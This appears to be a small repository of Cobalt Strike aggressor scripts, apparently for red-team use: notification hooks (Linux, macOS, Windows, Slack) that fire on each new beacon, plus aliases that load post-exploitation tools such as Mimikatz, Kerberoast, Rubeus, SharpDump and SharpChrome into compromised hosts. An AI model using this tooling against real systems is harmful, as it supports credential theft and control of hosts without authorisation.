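├── README.md
├── linux-notify.cna
├── load_arsenal.cna
├── macos-notify.cna
├── slack-notify.cna
└── win-notify.cna

/README.md:
--------------------------------------------------------------------------------
# AggressorScripts
A collection of Cobalt Strike aggressor scripts

--------------------------------------------------------------------------------
/linux-notify.cna:
--------------------------------------------------------------------------------
#### Notify Beacon
## Aggressor script that raises a Linux desktop notification when you get a new beacon
### Author: Sabri (@KINGSABRI)

### Usage ###
# - Install libnotify-bin (required)
#   $ apt install libnotify-bin
### Output ###
# Get a beacon and you will get desktop notifications

# Runs for each new beacon; $1 is the beacon ID handed to binfo().
on beacon_initial {
    # Sleep variables are global unless declared, so scope them to this handler.
    local('$beacon $user $host $computer $pid $title $message @notify');

    $beacon   = binfo($1);
    $user     = $beacon['user'];
    $host     = $beacon['host'];
    $computer = $beacon['computer'];
    $pid      = $beacon['pid'];
    $title    = "New Beacon! ";
    $message  = '' . $user . '@' . $host . ' (' . $computer . ') | ' . $pid;

    # exec() receives an argument array, so each value is handed to notify-send
    # as one argument instead of being parsed as a command line.
    @notify = @('notify-send', '-u', 'critical', '-i', '/opt/cobaltstrike/icon.jpg', $title, $message);
    exec(@notify);
}

--------------------------------------------------------------------------------
/load_arsenal.cna:
--------------------------------------------------------------------------------
#### Load PowerShells
## Aggressor script to simplify importing powershell scripts using powershell-import
### Author: Sabri (@KINGSABRI)

### Usage ###
# 1. Modify/Add your script paths in global variable section
# 2. Import into Cobalt Strike
# 3. From beacon try
#       beacon> load_powerview
#       beacon> load_powerup
#       beacon> load_powerupsql
#       beacon> whoami
### Output ###
#   powershell-import task gets executed
#   execute-assembly task gets executed

### Global variables section
$powerview_path   = "/rt/p/rt-powershell/PowerView.ps1";
$powerup_path     = "/rt/p/rt-powershell/PowerUp.ps1";
$powerupsql_path  = "/rt/p/rt-powershell/PowerUpSQL/PowerUpSQL.ps1";
$kerberoast_path  = "/rt/p/rt-powershell/Invoke-Kerberoast.ps1";
$mimikatz_path    = "/rt/p/rt-powershell/Invoke-Mimikatz.ps1";
$whoami_path      = "/rt/p/rt-compiled/SharpSploit/whoami.exe";
$rubeus_path      = "/rt/p/rt-compiled/GhostPack/Rubeus.exe";
$seatbelt_path    = "/rt/p/rt-compiled/GhostPack/Seatbelt.exe";
$sharpUp_path     = "/rt/p/rt-compiled/GhostPack/SharpUp.exe";
$sharpWMI_path    = "/rt/p/rt-compiled/GhostPack/SharpWMI.exe";
$sharpDump_path   = "/rt/p/rt-compiled/GhostPack/SharpDump.exe";
# NOTE(review): "GhostPac" differs from the "GhostPack" directory used by the entries above - confirm the path.
$sharpChrome_path = "/rt/p/rt-compiled/GhostPac/SharpChrome.exe";
$sharpLocker_path = "/rt/p/rt-compiled/Misc/SharpLocker.exe";
###

# $1 is an array: element 0 is the beacon ID, element 1 the script path.
# The command is echoed to the beacon console before the import is issued.
sub load_ps_script
{
    $bid  = $1[0];
    $file = $1[1];
    binput($bid, "powershell_import $file");
    bpowershell_import($bid, $file);
}

# $1 is an array: element 0 is the beacon ID, element 1 the assembly path.
# Elements from index 3 onward are joined with spaces and used as the parameter string.
sub load_bin_script
{
    $bid    = $1[0];
    $file   = $1[1];
    $params = join(' ', sublist($1, 3));
    binput($bid, "execute-assembly $file $params");
    bexecute_assembly($bid, $file, $params);
}

#
# PowerShells
#
alias load_powerview {
    @args = @($1, $powerview_path);
    load_ps_script(@args);
}

alias load_powerup {
    @args = @($1, $powerup_path);
    load_ps_script(@args);
}

alias load_powerupsql {
    @args = @($1, $powerupsql_path);
    load_ps_script(@args);
}

alias load_kerberoast {
    @args = @($1, $kerberoast_path);
    load_ps_script(@args);
}

alias load_mimikatz {
    @args = @($1, $mimikatz_path);
    load_ps_script(@args);
}



#
# Binaries
#
alias whoami {
    @args = @($1, $whoami_path);
    load_bin_script(@args);
}

# NOTE(review): this alias passes flatten(@args); the aliases below pass @args as
# built, with @_ as a single nested element. load_bin_script reads parameters from
# index 3 onward - confirm both call styles behave the same.
alias exec_rubeus {
    @args = @($1, $rubeus_path, @_);
    load_bin_script(flatten(@args));
}

alias exec_seatbelt {
    @args = @($1, $seatbelt_path, @_);
    load_bin_script(@args);
}

alias exec_sharpUp {
    @args = @($1, $sharpUp_path, @_);
    load_bin_script(@args);
}

alias exec_sharpWMI {
    @args = @($1, $sharpWMI_path, @_);
    load_bin_script(@args);
}

alias exec_sharpDump {
    @args = @($1, $sharpDump_path, @_);
    load_bin_script(@args);
}

alias exec_sharpChrome {
    @args = @($1, $sharpChrome_path, @_);
    load_bin_script(@args);
}

alias exec_sharpLocker {
    @args = @($1, $sharpLocker_path, @_);
    load_bin_script(@args);
}

--------------------------------------------------------------------------------
/macos-notify.cna:
--------------------------------------------------------------------------------
#### Notify Beacon
## Aggressor script that raises a macOS desktop notification when you get a new beacon
### Author: Sabri (@KINGSABRI)

### Usage ###
# - the terminal-notifier can be installed by one of the following
#   $gem install terminal-notifier
#     or
#   $brew install terminal-notifier
### Output ###
# Get a beacon and you will get desktop notifications

# Runs for each new beacon; $1 is the beacon ID handed to binfo().
on beacon_initial {
    # Sleep variables are global unless declared, so scope them to this handler.
    local('$beacon $user $host $computer $pid $title $message @notify');

    $beacon   = binfo($1);
    $user     = $beacon['user'];
    $host     = $beacon['host'];
    $computer = $beacon['computer'];
    $pid      = $beacon['pid'];
    $title    = "New Beacon!";
    $message  = $user . '@' . $host . ' (' . $computer . ') | ' . $pid;

    # exec() receives an argument array, so each value is handed to
    # terminal-notifier as one argument instead of being parsed as a command line.
    @notify = @('/usr/local/bin/terminal-notifier', '-message', $message, '-title', $title);
    exec(@notify);
}

--------------------------------------------------------------------------------
/slack-notify.cna:
--------------------------------------------------------------------------------
#### Slack Notify
## Aggressor script to send a slack notification with basic beacon info on a new beacon's initial call
### Author: Sabri (@KINGSABRI)

### Usage ###
# 1. Edit $teamserver, $slack_channel, $bot_name and $slack_webhook
# 2. run it as a headless: ./agscript 127.0.0.1 50050 SlackNotify PASSWORD slack-notify.cna
#    (the password is given as a command-line argument here, so it can end up in
#    shell history and process listings on that host)
### Output ###
# Get a beacon and check your slack ;)

$teamserver    = "Main C2";
$slack_channel = "#Hell";
$bot_name      = "CS-Bot";
# The webhook URL works as a credential for the channel: keep the real value out
# of version control.
$slack_webhook = "https://hooks.slack.com/services/XXX/YYY/ZZZ";

# Runs for each new beacon; $1 is the beacon ID handed to binfo().
on beacon_initial {
    # Sleep variables are global unless declared, so scope them to this handler.
    local('$beacon $user $host $computer $pid $message @curl_command');

    $beacon = binfo($1);

    # Beacon metadata is reported by the remote host, so it is untrusted input.
    # The JSON below is assembled by string concatenation; a quote or backslash
    # in a field would break out of its JSON string. Anything outside a small
    # allow-list is replaced with '_' before the fields are used.
    $user     = replace($beacon['user'],     '[^A-Za-z0-9 ._@*-]', '_');
    $host     = replace($beacon['host'],     '[^A-Za-z0-9 ._@*-]', '_');
    $computer = replace($beacon['computer'], '[^A-Za-z0-9 ._@*-]', '_');
    $pid      = replace($beacon['pid'],      '[^A-Za-z0-9 ._@*-]', '_');

    $message  = 'payload={"username": "' . $bot_name . '", "channel": "' . $slack_channel . '","attachments": [{"color": "danger","author_name": "' . $teamserver . '", "fallback": "New Beacon ' . $teamserver . ' | ' . $pid . '", "fields": [{"title": "' . $user . '@' . $host . ' (' . $computer . ')","short": false}],"footer": "PID: ' . $pid . '"}]}';

    # Argument array: the payload and the URL each reach curl as one argument.
    @curl_command = @('curl', '-X', 'POST', '--data-urlencode', $message, $slack_webhook);
    exec(@curl_command);
}

--------------------------------------------------------------------------------
/win-notify.cna:
--------------------------------------------------------------------------------
#### Notify Beacon
## Aggressor script that raises a Windows desktop notification when you get a new beacon
### Author: Sabri (@KINGSABRI)

### Usage ###
# - the powershell is installed on Windows by default
### Output ###
# Get a beacon and you will get desktop notifications

# Runs for each new beacon; $1 is the beacon ID handed to binfo().
on beacon_initial {
    # Sleep variables are global unless declared. Without this, $message kept the
    # previous event's script and every '.=' below appended to it.
    local('$beacon $user $host $computer $pid $title $message $encoded @notify');

    $beacon = binfo($1);

    # Beacon metadata is reported by the remote host, so it is untrusted input,
    # and here it ends up inside a PowerShell script that runs on the local
    # workstation. Anything outside a small allow-list (which excludes quotes,
    # '$', backticks and parentheses) is replaced with '_'.
    $user     = replace($beacon['user'],     '[^A-Za-z0-9 ._@*-]', '_');
    $host     = replace($beacon['host'],     '[^A-Za-z0-9 ._@*-]', '_');
    $computer = replace($beacon['computer'], '[^A-Za-z0-9 ._@*-]', '_');
    $pid      = replace($beacon['pid'],      '[^A-Za-z0-9 ._@*-]', '_');

    $title = "New Beacon!";

    # First piece uses '=' so the script always starts empty.
    $message  = '[reflection.assembly]::loadwithpartialname("System.Windows.Forms");[reflection.assembly]::loadwithpartialname("System.Drawing");';
    $message .= '$notify = new-object system.windows.forms.notifyicon;';
    $message .= '$notify.icon = [System.Drawing.SystemIcons]::Information;';
    $message .= '$notify.visible = $true;';
    $message .= '$notify.showballoontip(20,';
    $message .= '"' . $title . '"';
    $message .= ',';
    # Single-quoted PowerShell literal: its content is not expanded by PowerShell.
    $message .= "'" . $user . '@' . $host . ' (' . $computer . ') | ' . $pid . "'";
    $message .= ',';
    $message .= '[system.windows.forms.tooltipicon]::None);';

    # powershell.exe -enc takes the script as base64 over UTF-16LE text.
    $encoded = base64_encode(str_encode($message, "UTF-16LE"));
    @notify = @('powershell.exe', '-enc', $encoded);
    exec(@notify);
}

--------------------------------------------------------------------------------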